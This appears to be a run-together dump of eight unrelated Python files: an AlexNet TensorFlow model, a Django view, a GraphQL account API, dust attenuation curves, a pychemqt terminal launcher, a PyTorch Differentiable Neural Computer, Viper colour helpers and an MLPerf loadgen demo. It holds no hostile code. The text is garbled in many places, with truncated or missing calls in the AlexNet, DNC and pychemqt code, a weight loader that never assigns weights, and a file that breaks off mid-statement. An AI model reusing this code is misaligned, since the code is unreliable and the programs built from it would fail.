lrn(conv2, 2, 2e-05, 0.75, name='norm2') pool2 = max_pool(norm2, 3, 3, 2, 2, padding='VALID', name='pool2') # 3rd Layer: Conv (w ReLu) conv3 = conv(pool2, 3, 3, 384, 1, 1, name='conv3') # 4th Layer: Conv (w ReLu) splitted into two groups conv4 = conv(conv3, 3, 3, 384, 1, 1, groups=2, name='conv4') # 5th Layer: Conv (w ReLu) -> Pool splitted into two groups conv5 = conv(conv4, 3, 3, 256, 1, 1, groups=2, name='conv5') pool5 = max_pool(conv5, 3, 3, 2, 2, padding='VALID', name='pool5') # 6th Layer: Flatten -> FC (w ReLu) -> Dropout flattened = tf.reshape(pool5, [-1, 6*6*256]) fc6 = fc(flattened, 6*6*256, 4096, name='fc6') dropout6 = dropout(fc6, self.KEEP_PROB) # 7th Layer: FC (w ReLu) -> Dropout fc7 = fc(dropout6, 4096, 4096, name='fc7') dropout7 = dropout(fc7, self.KEEP_PROB) # 8th Layer: FC and return unscaled activations self.fc8 = fc(dropout7, 4096, self.NUM_CLASSES, relu=False, name='fc8') def load_initial_weights(self, session): """Load weights from file into network. As the weights from come as a dict of lists (e.g. weights['conv1'] is a list) and not as dict of dicts (e.g. weights['conv1'] is a dict with keys 'weights' & 'biases') we need a special load function """ # Load the weights into memory weights_dict = np.load(self.WEIGHTS_PATH, encoding='bytes').item() # Loop over all layer names stored in the weights dict for op_name in weights_dict: # Check if layer should be trained from scratch if op_name not in self.SKIP_LAYER: with tf.variable_scope(op_name, reuse=True): # Assign weights/biases to their corresponding tf variable for data in weights_dict[op_name]: # Biases if len(data.shape) == 1: var = tf.get_variable('biases', trainable=False) # Weights else: var = tf.get_variable('weights', trainable=False) def conv(x, filter_height, filter_width, num_filters, stride_y, stride_x, name, padding='SAME', groups=1): """Create a convolution layer. Adapted from: """ # Get number of input channels input_channels = int(x.get_shape()[-1]) # Create lambda function for the convolution convolve = lambda i, k: tf.nn.conv2d(i, k, strides=[1, stride_y, stride_x, 1], padding=padding) with tf.variable_scope(name) as scope: # Create tf variables for the weights and biases of the conv layer weights = tf.get_variable('weights', shape=[filter_height, filter_width, input_channels/groups, num_filters]) biases = tf.get_variable('biases', shape=[num_filters]) if groups == 1: conv = convolve(x, weights) # In the cases of multiple groups, split inputs & weights and else: # Split input and weights and convolve them separately input_groups = tf.split(axis=3, num_or_size_splits=groups, value=x) weight_groups = tf.split(axis=3, num_or_size_splits=groups, value=weights) output_groups = [convolve(i, k) for i, k in zip(input_groups, weight_groups)] # Concat the convolved output together again conv = tf.concat(axis=3, values=output_groups) # Add biases bias = tf.reshape(tf.nn.bias_add(conv, biases), tf.shape(conv)) # Apply relu function relu = tf.nn.relu(bias, return relu def fc(x, num_in, num_out, name, relu=True): """Create a fully connected layer.""" with tf.variable_scope(name) as scope: # Create tf variables for the weights and biases weights = tf.get_variable('weights', shape=[num_in, num_out], trainable=True) biases = tf.get_variable('biases', [num_out], trainable=True) # Matrix multiply weights and inputs and add bias act = tf.nn.xw_plus_b(x, weights, biases, if relu: # Apply ReLu non linearity relu = tf.nn.relu(act) return relu else: return act def max_pool(x, filter_height, filter_width, stride_y, stride_x, name, padding='SAME'): """Create a max pooling layer.""" return tf.nn.max_pool(x, ksize=[1, filter_height, filter_width, 1], strides=[1, stride_y, stride_x, 1], padding=padding, name=name) def lrn(x, radius, alpha, beta, name, bias=1.0): """Create a local response normalization layer.""" return tf.nn.local_response_normalization(x, depth_radius=radius, alpha=alpha, beta=beta, bias=bias, name=name) def dropout(x, keep_prob): """Create a dropout layer.""" return tf.nn.dropout(x, keep_prob)
#!/usr/bin/env python # -*- coding: utf-8 -*- from django.views.generic import TemplateView from django.utils.translation import ugettext_lazy as _ from neutron.models import Meaning, WordAlternate, Word from neutron.views import WordAlternateRandomMeaningRun from ..forms import WordAlternateForm import logging log = logging.getLogger(__name__) class WordAlternateHome(TemplateView): template_name = 'wordalternate/home.html' class WordAlternateRun(WordAlternateRandomMeaningRun): form_class = WordAlternateForm template_name = 'wordalternate/run.html' def form_valid(self, form, time_elapsed=None): meaning = Meaning.objects.get(pk=form.cleaned_data['item']) button = form.cleaned_data['button'] word_alternate = WordAlternate(meaning=meaning) if button == 0: value = form.cleaned_data['value'] if not value: # Jump to another item but keep track of error log.error("WordAlternateRun form error, user '{}' left value field empty.".format(self.request.user)) return super(WordAlternateRun, self).form_valid(form=None) alternate, _ = Word.objects.get_or_create(word=value) alternate_meaning = Meaning(word=alternate, definition=meaning.definition) alternate_meaning.informer = self.request.user.as_informer() alternate_meaning.excluded = True # TODO: May I accept directly new words? word_alternate.value = alternate_meaning word_alternate.informer = self.request.user.as_informer() word_alternate.interface = self.interface word_alternate.elapsed_time = time_elapsed return super(WordAlternateRun, self).form_valid(form=None) def get_context_data(self, **kwargs): context = super(WordAlternateRun, self).get_context_data(**kwargs) context.update({'button_items': [(0, _("Set alternate")), (1, _("Can't remember now"))]}) return context
__copyright__ = 'Copyright(c) Gordon Elliott 2017' """ """ import graphene from a_tuin.api import ( node_class, node_connection_field, get_update_mutation, get_create_mutation, get_local_fields ) from glod.api.account_leaf import AccountLeaf from glod.api.fund_node import FundLeaf from glod.db.account import Account, AccountQuery account_fields = get_local_fields(Account) account_node_fields = account_fields.copy() # TODO can we derive this from the model references? account_node_fields['funds'] = graphene.Field( graphene.List(FundLeaf, description='Funds for this account.') ) AccountNode = node_class(Account.__name__, AccountLeaf, account_node_fields) accounts_connection_field = node_connection_field( Account, AccountQuery, AccountNode, description='List of all bank accounts' ) accounts_options_field = node_connection_field( Account, AccountQuery, AccountLeaf, description='List of all bank accounts for select fields' ) CreateAccountLeaf = get_create_mutation(Account, account_fields, AccountLeaf) UpdateAccountLeaf = get_update_mutation(Account, account_fields, AccountLeaf)
import numpy as np import warnings, sys # -------------------- # ATTENUATION CURVES # -------------------- def powerlaw(wave, tau_v=1, alpha=1.0, **kwargs): """Simple power-law attenuation, normalized to 5500\AA. :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :returns tau: The optical depth at each wavelength. """ return tau_v * (wave / 5500)**(-alpha) def calzetti(wave, tau_v=1, R_v=4.05, **kwargs): """Calzetti et al. 2000 starburst attenuation curve, with extrapolations to the FUV and NIR. :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :param R_v: (default: 4.05) The ratio of total selective extinction, parameterizing the slope of the attenuation curve. A_v = R_v * E(B-V) :returns tau: The optical depth at each wavelength. """ # optical/NIR k1 = lambda x: 2.659 * (-1.857 + 1.040 * x) # UV k2 = lambda x: 2.659 * (-2.156 + 1.509 * x - 0.198 * x**2. + 0.011 * x**3.) # get slopes at edges and k(5500) uv = np.array([0.12, 0.13]) * 1e4 kuv = k2(1e4 / uv) + R_v uv_slope = np.diff(kuv) / np.diff(uv) ir = np.array([2.19, 2.20]) * 1e4 kir = k1(1e4 / ir) + R_v ir_slope = np.diff(kir) / np.diff(ir) k_v = k2(1e4 / 5500.) + R_v # define segments uinds = (wave >= 1200.) & (wave < 6300) # uv oinds = (wave >= 6300.) & (wave <= 22000) # optical xinds = (wave < 1200.) # xuv iinds = (wave > 22000.) # ir # do it x = 1e4 / wave ktot = oinds * (k1(x) + R_v) ktot += uinds * (k2(x) + R_v) ktot += xinds * (kuv[0] + (wave - uv[0]) * uv_slope) ktot += iinds * (kir[1] + (wave - ir[1]) * ir_slope) ktot[ktot < 0] = 0 tau_lambda = tau_v * (ktot / k_v) return tau_lambda def drude(x, x0=4.59, gamma=0.90, **extras): """Drude profile for the 2175AA bump. :param x: Inverse wavelength (inverse microns) at which values for the drude profile are requested. :param gamma: Width of the Drude profile (inverse microns). :param x0: Center of the Drude profile (inverse microns). :returns k_lambda: The value of the Drude profile at x, normalized such that the peak is 1. """ #return (w * gamma)**2 / ((w**2 - w0**2)**2 + (w * gamma)**2) return (x*gamma)**2 / ((x**2 - x0**2)**2 + (x * gamma)**2) def noll(wave, tau_v=1, delta=0.0, c_r=0.0, Ebump=0.0, **kwargs): """Noll 2009 attenuation curve. This is based on the Calzetti curve, with added variable bump (as Drude) and overall slope change. Any extra keywords are passed to the Drude (e.g. x0, gamma, both in inverse microns). :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :param Ebump: (default: 0.0) Stength of the 2175\AA bump. Normalizes the Drude profile. :param delta: (default 0.) Slope of the power-law that modifies the Calzetti curve. :param c_r: Constant used to alter R_v=A_V/E(B-V) of the curve. To maintain the Calzetti R_v=4.05, use c_r = -delta. Note that even with c_r = -delta the calzetti curve will not be recovered unless delta=0 :returns tau: The optical depth at each wavelength. """ kcalz = calzetti(wave, tau_v=1.0, R_v=4.05) - 1 k = kcalz + Ebump / 4.05 * drude(1e4 / wave, **kwargs) a = (k * (1 - 1.12 * c_r) + 1) * (wave / 5500.)**delta return a * tau_v def chevallard(wave, tau_v=1, **kwargs): """ \tau_v dependent attenuation curves matched to disk RT models, as in Chevallard et al. 2013. No UV bump (or indeed tests in the UV at all). :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :returns tau: The optical depth at each wavelength. """ # missing a UV bump alpha_v = 2.8 / (1 + np.sqrt(tau_v)) # +/- 25% bb = 0.3 - 0.05 * tau_v # +/- 10% alpha = alpha_v + bb * (wave * 1e-4 - 0.55) tau_lambda = tau_v * (wave / 5500.0)**(-alpha) return tau_lambda def conroy(wave, tau_v=1, R_v=3.1, f_bump=0.6, **kwargs): """ Conroy & Schiminovich 2010 dust attenuation curves including a decreased UV bump. :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :param R_v: (default: 3.1) The ratio of total selective extinction, parameterizing the slope of the attenuation curve. A_v = R_v * E(B-V) :param f_bump: (default: 0.6) The strength of the 2175\AA UV bump, as a fraction of the bump strength in Cardelli et al. extinction curve. :returns tau: The optical depth at each wavelength. """ x = 1e4 / wave nx = x.shape[0] a = np.zeros_like(x) b = np.zeros_like(x) # IR 0.909 - 3.3 micron ir = (x >= 0.3) & (x < 1.1) a[ir] = 0.574 * x[ir]**1.61 b[ir] = -0.527 * x[ir]**1.61 # optical 0.303 - 0.909 micron opt = (x >= 1.1) & (x < 3.3) y = x[opt]-1.82 a[opt] = (1 + 0.177 * y - 0.504 * y**2 - 0.0243 * y**3 + 0.721 * y**4 + 0.0198 * y**5 - 0.7750 * y**6 + 0.330 * y**7) b[opt] = (1.413 * y + 2.283 * y**2 + 1.072 * y**3 - 5.384 * y**4 - 0.622 * y**5 + 5.303 * y**6 - 2.090 * y**7) # NUV 0.17 to 0.303 micron nuv = (x >= 3.3) & (x < 5.9) tmp = (-0.0370 + 0.0469 * f_bump - 0.601 * f_bump / R_v + 0.542 / R_v) fa = (3.3 / x[nuv])**6. * tmp tmp = 0.104 * f_bump / ((x[nuv] - 4.67)**2 + 0.341) a[nuv] = 1.752 - 0.316 * x[nuv] - tmp + fa tmp = 1.206 * f_bump / ((x[nuv] - 4.62)**2 + 0.263) b[nuv] = -3.09 + 1.825 * x[nuv] + tmp # FUV 0.125 - 0.17 micron fuv = (x >= 5.9) & (x < 8.0) fa = -0.0447 * (x[fuv] - 5.9)**2.0 - 0.00978 * (x[fuv] - 5.9)**3 fb = 0.213 * (x[fuv] - 5.9)**2. + 0.121 * (x[fuv] - 5.9)**3 tmp = 0.104 * f_bump / ((x[fuv] - 4.67)**2 + 0.341) a[fuv] = 1.752 - 0.316 * x[fuv] - tmp + fa tmp = 1.206 * f_bump / ((x[fuv] - 4.62)**2 + 0.263) b[fuv] = -3.09 + 1.825 * x[fuv] + tmp + fb alam = (a + b / R_v) # XUV below 1250AA xuv = x >= 8.0 x8 = 8.0 fa = -0.0447 * (x8 - 5.9)**2 - 0.00978 * (x8 - 5.9)**3 fb = 0.213 * (x8 - 5.9)**2. + 0.121 * (x8 - 5.9)**3 tmp = 0.104 * f_bump / ((x8 - 4.67)**2 + 0.341) af = 1.752 - 0.316 * x8 - tmp + fa tmp = 1.206 * f_bump / ((x8 - 4.62)**2 + 0.263) bf = -3.09 + 1.825 * x8 + tmp + fb a8 = (af + bf / R_v) alam[xuv] = (x8 / x[xuv])**(-1.3) * a8 return tau_v * alam def broken_powerlaw(wave, tau_v=1, alpha=[0.7, 0.7, 0.7], breaks=[0, 3000, 10000, 4e4], **kwargs): """ Attenuation curve as in V. Wild et al. 2011, i.e. power-law slope can change between regions. Superceded by Chevallard 2013 for optical/NIR. :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :returns tau: The optical depth at each wavelength. """ if len(breaks) == len(alpha)+1: print("make sure of your power law breaks") tau = np.array(len(wave)) for i in range(alpha): inds = (wave > breaks[i]) & (wave <= breaks[i+1]) tau[inds] = tau_v * (wave / 5500)**alpha[i] return tau def wg00(wave, tau_v=1, geometry='SHELL', composition='MW', local='homogenous', **kwargs): """ Witt+Gordon 2000 DIRTY radiative transfer results, for idealized geometries. """ pass # ------------------ # EXTINCTION CURVES # ------------------ def cardelli(wave, tau_v=1, R_v=3.1, **kwargs): """ Cardelli, Clayton, and Mathis 1998 Milky Way extinction curve, with an update in the near-UV from O'Donnell 1994 :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :param R_v: (default: 3.1) The ratio of total selective extinction, parameterizing the slope of the attenuation curve. A_v = R_v * E(B-V) :returns tau: The optical depth at each wavelength. """ # if (wave < 1e3).any() : # warnings.warn('Cardelli: extinction not defined (set to zero) below 1000AA') mic = wave*1e-4 x_sup, x_inf = 10.0, 0.3 x = 1 / mic a = np.zeros_like(x) b = np.zeros_like(x) w1 = (x >= 1.1) & (x <= 3.3) # Optical 0.303 to 0.909 micron w2 = (x >= x_inf) & (x < 1.1) # NIR 0.909 to 3.3 micron w3 = (x > 3.3) & (x <= 8) # UV 0.125 - 0.303 micron w4 = (x > 8.0) & (x <= x_sup) # XUV, 1000 -1250AA wsh = x > x_sup wlg = x < x_inf y = x[w1] - 1.82 a[w1] = (1 + 0.17699 * y - 0.50447 * y**2. - 0.02427 * y**3. + 0.72085 * y**4. + 0.01979 * y**5. - 0.77530 * y**6. + 0.32999 * y**7.0) b[w1] = (1.41338 * y + 2.28305 * y**2. + 1.07233 * y**3. - 5.38434 * y**4. - 0.62251 * y**5. + 5.30260 * y**6. - 2.09002 * y**7.) y = x[w2]**1.61 a[w2] = 0.574 * y b[w2] = -0.527 * y fa = x[w3] * 0. fb = x[w3] * 0. ou = (x[w3] > 5.9) # print(type(ou),ou[0], type(w3)) if ou.any(): y = x[w3][ou] - 5.9 fa[ou] = -0.04473 * y**2. - 0.009779 * y**3. fb[ou] = 0.2130 * y**2. + 0.1207 * y**3. a[w3] = 1.752 - 0.316 * x[w3] - 0.104 / ((x[w3] - 4.67)**2. + 0.341) + fa b[w3] = -3.090 + 1.825 * x[w3] + 1.206 / ((x[w3] - 4.62)**2. + 0.263) + fb y = x[w4] - 8. a[w4] = -1.073 - 0.628 * y + 0.137 * y**2. - 0.070 * y**3. b[w4] = 13.670 + 4.257 * y - 0.420 * y**2. + 0.374 * y**3. tau = a + b / R_v return tau_v * tau def smc(wave, tau_v=1, **kwargs): """Pei 1992 SMC extinction curve. :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :returns tau: The optical depth at each wavelength. """ if (wave < 1e3).any(): warnings.warn('SMC: extinction extrapolation below 1000AA is poor') mic = wave * 1e-4 aa = [185., 27., 0.005, 0.010, 0.012, 0.030] ll = [0.042, 0.08, 0.22, 9.7, 18., 25.] bb = [90., 5.50, -1.95, -1.95, -1.80, 0.00] nn = [2.0, 4.0, 2.0, 2.0, 2.0, 2.0] abs_ab = np.zeros_like(mic) norm_v = 0 # hack to go from tau_b to tau_v mic_5500 = 5500 * 1e-4 for i, a in enumerate(aa): norm_v += aa[i] / ((mic_5500 / ll[i])**nn[i] + (ll[i] / mic_5500)**nn[i] + bb[i]) abs_ab += aa[i] / ((mic / ll[i])**nn[i] + (ll[i] / mic)**nn[i] + bb[i]) return tau_v * (abs_ab / norm_v) def lmc(wave, tau_v=1, **kwargs): """ Pei 1992 LMC extinction curve. :param wave: The wavelengths at which optical depth estimates are desired. :param tau_v: (default: 1) The optical depth at 5500\AA, used to normalize the attenuation curve. :returns tau: The optical depth at each wavelength. """ if (wave < 1e3).any(): warnings.warn('LMC: extinction extrapolation below 1000AA is poor') mic = wave * 1e-4 aa = [175., 19., 0.023, 0.005, 0.006, 0.020] ll = [0.046, 0.08, 0.22, 9.7, 18., 25.] bb = [90., 5.50, -1.95, -1.95, -1.80, 0.00] nn = [2.0, 4.5, 2.0, 2.0, 2.0, 2.0] abs_ab = mic * 0. norm_v = 0 # hack to go from tau_b to tau_v mic_5500 = 5500 * 1e-4 for i, a in enumerate(aa): norm_v += aa[i] / ((mic_5500 / ll[i])**nn[i] + (ll[i] / mic_5500)**nn[i] + bb[i]) abs_ab += aa[i] / ((mic / ll[i])**nn[i] + (ll[i] / mic)**nn[i] + bb[i]) return tau_v * (abs_ab / norm_v)
#!/usr/bin/python3 # -*- coding: utf-8 -*- '''Pychemqt, Chemical Engineering Process simulator Copyright (C) 2009-2017, Juan José Gómez Romera <> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <>.''' ############################################################################### # Tools to create a python shell with pychemqt libraries imported # For now only work in linux with xterm as terminal ############################################################################### import atexit from PyQt5 import QtCore, QtWidgets from tools.firstrun import which class XTerm(QtCore.QProcess): """Gui container for terminal widget""" def __init__(self, config, parent=None): super(XTerm, self).__init__(parent) self.config = config atexit.register(self.kill) self.show_term() def sizeHint(self): size = QtCore.QSize(400, 300) return size.expandedTo(QtWidgets.QApplication.globalStrut()) def show_term(self): term = self.config.get("Applications", 'Shell') args = [ "-bg", self.config.get("Applications", "backgroundColor"), "-fg", self.config.get("Applications", "foregroundColor"), # blink cursor "-bc", # title "-T", QtWidgets.QApplication.translate( "pychemqt", "pychemqt python console")] if self.config.getboolean("Applications", "maximized"): args.append("-maximized") if self.config.getboolean("Applications", 'ipython') and \ which("ipython"): args.append("ipython3") else: args.append("python3") self.start(term, args) if self.error() == QtCore.QProcess.FailedToStart: print("xterm not installed") if __name__ == "__main__": import sys from configparser import ConfigParser import os app = QtWidgets.QApplication(sys.argv) conf_dir = os.path.expanduser('~') + "/.pychemqt/" pychemqt_dir = os.environ["PWD"] + "/" preferences = ConfigParser()"pychemqtrc") terminal = XTerm(preferences) app.exec_()
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import torch.nn as nn import torch as T from torch.autograd import Variable as var import numpy as np from torch.nn.utils.rnn import pad_packed_sequence as pad from torch.nn.utils.rnn import pack_padded_sequence as pack from torch.nn.utils.rnn import PackedSequence from .util import * from .memory import * from torch.nn.init import orthogonal_, xavier_uniform_ class DNC(nn.Module): def __init__( self, input_size, hidden_size, rnn_type='lstm', num_layers=1, num_hidden_layers=2, bias=True, batch_first=True, dropout=0, bidirectional=False, nr_cells=5, read_heads=2, cell_size=10, nonlinearity='tanh', gpu_id=-1, independent_linears=False, share_memory=True, debug=False, clip=20 ): super(DNC, self).__init__() # todo: separate weights and RNNs for the interface and output vectors self.input_size = input_size self.hidden_size = hidden_size self.rnn_type = rnn_type self.num_layers = num_layers self.num_hidden_layers = num_hidden_layers self.bias = bias self.batch_first = batch_first self.dropout = dropout self.bidirectional = bidirectional self.nr_cells = nr_cells self.read_heads = read_heads self.cell_size = cell_size self.nonlinearity = nonlinearity self.gpu_id = gpu_id self.independent_linears = independent_linears self.share_memory = share_memory self.debug = debug self.clip = clip self.w = self.cell_size self.r = self.read_heads self.read_vectors_size = self.r * self.w self.output_size = self.hidden_size self.nn_input_size = self.input_size + self.read_vectors_size self.nn_output_size = self.output_size + self.read_vectors_size self.rnns = [] self.memories = [] for layer in range(self.num_layers): if self.rnn_type.lower() == 'rnn': self.rnns.append(nn.RNN((self.nn_input_size if layer == 0 else self.nn_output_size), self.output_size, bias=self.bias, nonlinearity=self.nonlinearity, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers)) elif self.rnn_type.lower() == 'gru': self.rnns.append(nn.GRU((self.nn_input_size if layer == 0 else self.nn_output_size), self.output_size, bias=self.bias, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers)) if self.rnn_type.lower() == 'lstm': self.rnns.append(nn.LSTM((self.nn_input_size if layer == 0 else self.nn_output_size), self.output_size, bias=self.bias, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers)) setattr(self, self.rnn_type.lower() + '_layer_' + str(layer), self.rnns[layer]) # memories for each layer if not self.share_memory: self.memories.append( Memory( input_size=self.output_size, mem_size=self.nr_cells, cell_size=self.w, read_heads=self.r, gpu_id=self.gpu_id, independent_linears=self.independent_linears ) ) setattr(self, 'rnn_layer_memory_' + str(layer), self.memories[layer]) # only one memory shared by all layers if self.share_memory: self.memories.append( Memory( input_size=self.output_size, mem_size=self.nr_cells, cell_size=self.w, read_heads=self.r, gpu_id=self.gpu_id, independent_linears=self.independent_linears ) ) setattr(self, 'rnn_layer_memory_shared', self.memories[0]) # final output layer self.output = nn.Linear(self.nn_output_size, self.input_size) orthogonal_(self.output.weight) if self.gpu_id != -1: [x.cuda(self.gpu_id) for x in self.rnns] [x.cuda(self.gpu_id) for x in self.memories] self.output.cuda() def _init_hidden(self, hx, batch_size, reset_experience): # create empty hidden states if not provided if hx is None: hx = (None, None, None) (chx, mhx, last_read) = hx # initialize hidden state of the controller RNN if chx is None: h = cuda(T.zeros(self.num_hidden_layers, batch_size, self.output_size), gpu_id=self.gpu_id) xavier_uniform_(h) chx = [ (h, h) if self.rnn_type.lower() == 'lstm' else h for x in range(self.num_layers)] # Last read vectors if last_read is None: last_read = cuda(T.zeros(batch_size, self.w * self.r), gpu_id=self.gpu_id) # memory states if mhx is None: if self.share_memory: mhx = self.memories[0].reset(batch_size, erase=reset_experience) else: mhx = [m.reset(batch_size, erase=reset_experience) for m in self.memories] else: if self.share_memory: mhx = self.memories[0].reset(batch_size, mhx, erase=reset_experience) else: mhx = [m.reset(batch_size, h, erase=reset_experience) for m, h in zip(self.memories, mhx)] return chx, mhx, last_read def _debug(self, mhx, debug_obj): if not debug_obj: debug_obj = { 'memory': [], 'link_matrix': [], 'precedence': [], 'read_weights': [], 'write_weights': [], 'usage_vector': [], } debug_obj['memory'].append(mhx['memory'][0].data.cpu().numpy()) debug_obj['link_matrix'].append(mhx['link_matrix'][0][0].data.cpu().numpy()) debug_obj['precedence'].append(mhx['precedence'][0].data.cpu().numpy()) debug_obj['read_weights'].append(mhx['read_weights'][0].data.cpu().numpy()) debug_obj['write_weights'].append(mhx['write_weights'][0].data.cpu().numpy()) debug_obj['usage_vector'].append(mhx['usage_vector'][0].unsqueeze(0).data.cpu().numpy()) return debug_obj def _layer_forward(self, input, layer, hx=(None, None), pass_through_memory=True): (chx, mhx) = hx # pass through the controller layer input, chx = self.rnns[layer](input.unsqueeze(1), chx) input = input.squeeze(1) # clip the controller output if self.clip != 0: output = T.clamp(input, -self.clip, self.clip) else: output = input # the interface vector ξ = output # pass through memory if pass_through_memory: if self.share_memory: read_vecs, mhx = self.memories[0](ξ, mhx) else: read_vecs, mhx = self.memories[layer](ξ, mhx) # the read vectors read_vectors = read_vecs.view(-1, self.w * self.r) else: read_vectors = None return output, (chx, mhx, read_vectors) def forward(self, input, hx=(None, None, None), reset_experience=False, pass_through_memory=True): # handle packed data is_packed = type(input) is PackedSequence if is_packed: input, lengths = pad(input) max_length = lengths[0] else: max_length = input.size(1) if self.batch_first else input.size(0) lengths = [input.size(1)] * max_length if self.batch_first else [input.size(0)] * max_length batch_size = input.size(0) if self.batch_first else input.size(1) if not self.batch_first: input = input.transpose(0, 1) # make the data time-first controller_hidden, mem_hidden, last_read = self._init_hidden(hx, batch_size, reset_experience) # concat input with last read (or padding) vectors inputs = [[input[:, x, :], last_read], 1) for x in range(max_length)] # batched forward pass per element / word / etc if self.debug: viz = None outs = [None] * max_length read_vectors = None # pass through time for time in range(max_length): # pass thorugh layers for layer in range(self.num_layers): # this layer's hidden states chx = controller_hidden[layer] m = mem_hidden if self.share_memory else mem_hidden[layer] # pass through controller outs[time], (chx, m, read_vectors) = \ self._layer_forward(inputs[time], layer, (chx, m), pass_through_memory) # debug memory if self.debug: viz = self._debug(m, viz) # store the memory back (per layer or shared) if self.share_memory: mem_hidden = m else: mem_hidden[layer] = m controller_hidden[layer] = chx if read_vectors is not None: # the controller output + read vectors go into next layer outs[time] =[outs[time], read_vectors], 1) else: outs[time] =[outs[time], last_read], 1) inputs[time] = outs[time] if self.debug: viz = {k: np.array(v) for k, v in viz.items()} viz = {k: v.reshape(v.shape[0], v.shape[1] * v.shape[2]) for k, v in viz.items()} # pass through final output layer inputs = [self.output(i) for i in inputs] outputs = T.stack(inputs, 1 if self.batch_first else 0) if is_packed: outputs = pack(output, lengths) if self.debug: return outputs, (controller_hidden, mem_hidden, read_vectors), viz else: return outputs, (controller_hidden, mem_hidden, read_vectors) def __repr__(self): s = "\n----------------------------------------\n" s += '{name}({input_size}, {hidden_size}' if self.rnn_type != 'lstm': s += ', rnn_type={rnn_type}' if self.num_layers != 1: s += ', num_layers={num_layers}' if self.num_hidden_layers != 2: s += ', num_hidden_layers={num_hidden_layers}' if self.bias != True: s += ', bias={bias}' if self.batch_first != True: s += ', batch_first={batch_first}' if self.dropout != 0: s += ', dropout={dropout}' if self.bidirectional != False: s += ', bidirectional={bidirectional}' if self.nr_cells != 5: s += ', nr_cells={nr_cells}' if self.read_heads != 2: s += ', read_heads={read_heads}' if self.cell_size != 10: s += ', cell_size={cell_size}' if self.nonlinearity != 'tanh': s += ', nonlinearity={nonlinearity}' if self.gpu_id != -1: s += ', gpu_id={gpu_id}' if self.independent_linears != False: s += ', independent_linears={independent_linears}' if self.share_memory != True: s += ', share_memory={share_memory}' if self.debug != False: s += ', debug={debug}' if self.clip != 20: s += ', clip={clip}' s += ")\n" + super(DNC, self).__repr__() + \ "\n----------------------------------------\n" return s.format(name=self.__class__.__name__, **self.__dict__)
# This file is part of Viper - # See the file 'LICENSE' for copying permission. import os import sys def color(text, color_code, readline=False): """Colorize text. @param text: text. @param color_code: color. @return: colorized text. """ # $TERM under Windows: # cmd.exe -> "" (what would you expect..?) # cygwin -> "cygwin" (should support colors, but doesn't work somehow) # mintty -> "xterm" (supports colors) if sys.platform == "win32" and os.getenv("TERM") != "xterm": return str(text) if readline: # special readline escapes to fix colored input promps # return "\x01\x1b[%dm\x02%s\x01\x1b[0m\x02" % (color_code, text) return "\x1b[%dm%s\x1b[0m" % (color_code, text) def black(text, readline=False): return color(text, 30, readline) def red(text, readline=False): return color(text, 31, readline) def green(text, readline=False): return color(text, 32, readline) def yellow(text, readline=False): return color(text, 33, readline) def blue(text, readline=False): return color(text, 34, readline) def magenta(text, readline=False): return color(text, 35, readline) def cyan(text, readline=False): return color(text, 36, readline) def white(text, readline=False): return color(text, 37, readline) def bold(text, readline=False): return color(text, 1, readline)
# Copyright 2019 The MLPerf Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """Python version of """ from __future__ import print_function from absl import app import mlperf_loadgen import numpy def load_samples_to_ram(query_samples): del query_samples return def unload_samples_from_ram(query_samples): del query_samples return def issue_query(query_samples): responses = [] for s in query_samples: responses.append(mlperf_loadgen.QuerySampleResponse(, 0, 0)) mlperf_loadgen.QuerySamplesComplete(responses) def flush_queries(): pass def process_latencies(latencies_ns): print("Average latency: ") print(numpy.mean(latencies_ns)) print("Median latency: ") print(numpy.percentile(latencies_ns, 50)) print("90 percentile latency: ") print(numpy.percentile(latencies_ns, 90)) def main(argv): del argv settings = mlperf_loadgen.TestSettings() settings.scenario = mlperf_loadgen.TestScenario.SingleStream settings.mode = mlperf_loadgen.TestMode.PerformanceOnly sut = mlperf_loadgen.ConstructSUT( issue_query, flush_queries, process_latencies) qsl = mlperf_loadgen.ConstructQSL( 1024 * 1024, 1024, load_samples_to_ram, unload_samples_from_ram) mlperf_loadgen.StartTest(sut, qsl, settings) mlperf_loadgen.DestroyQSL(qsl) mlperf_loadgen.DestroySUT(sut) if __name__ == "__main__":
